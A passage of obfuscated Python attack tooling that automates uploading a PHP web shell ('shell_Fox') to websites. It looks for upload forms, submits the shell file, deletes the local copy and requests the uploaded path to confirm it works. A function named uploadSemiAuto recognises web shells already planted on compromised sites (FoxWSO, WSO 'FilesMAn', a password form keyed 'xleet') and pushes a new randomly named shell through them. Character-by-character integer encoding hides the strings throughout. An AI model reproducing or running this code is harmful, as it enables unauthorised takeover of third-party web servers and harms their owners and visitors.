zwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlscl
cpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<
<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
elif (str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk):
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlscl
cpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<
<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
elif (str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk):
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_h
lsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+__
____mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
else :
return (()==[])
if (sys.version_info[((()==[])+(()==[]))]<((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw)):
with open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))) as f:
f.write( shell_Fox )
else :
with open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]))) as f:
f.write( shell_Fox )
f.close()
if (sys.version_info[((()==[])+(()==[]))]<((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw)):
f=open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
else :
f=open(__________________________bqruohfppisx,str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
br.form.add_file(f,str("".join(chr(__RSV) for __RSV in [(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])),__________________________bqruohfppisx)
br.submit()
f.close()
os.remove(__________________________bqruohfppisx)
_______________________________elvnyqkmatgu=shellPath_Fox(________________________czrkpslclact,__________________________bqruohfppisx,(_hlsclcpzwvcu**_hlsclcpzwvcu))
_________________________xopyuxqnuyqk=requests.get(_______________________________elvnyqkmatgu, headers = headers , verify =(()==[]), timeout =((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))))
_________________________xopyuxqnuyqk=content_Fox(_________________________xopyuxqnuyqk)
if (str("".join(chr(__RSV) for __RSV in [(___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk and str("".join(chr(__RSV) for __RSV in 
[(___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in checkups ):
return _______________________________elvnyqkmatgu
return (()==[])
except :
try :
f.close()
except :
pass
try :
os.remove(__________________________bqruohfppisx)
pass
except :
pass
return (()==[])
def uploadSemiAuto(url, src, req):
try:
filename = random_Fox(10) + '.php'
if ('- FoxWSO v' in src):
filedata = {'a': 'BUbwxgj', 'p1': 'uploadFile', 'ne': '', 'charset': 'UTF-8', 'c': ''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('charset' in src and 'uploadFile' in src and 'FilesMAn' in src and 'Windows' in src) :
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
if('f[]' in src and 'name=f>' not in src):
fileup = {'f[]': (filename, shell_Fox)}
else:
fileup = {'f': (filename, shell_Fox)}
elif ('<pre align=center><form method=post>Password<br><input type=password name=pass' in src and 'style=\'background-color:whitesmoke;border:1px solid #FFF;outline:none' in src and 'type=submit name=\'watching\' value=\'submit\'' in src) :
post = {'pass': 'xleet'}
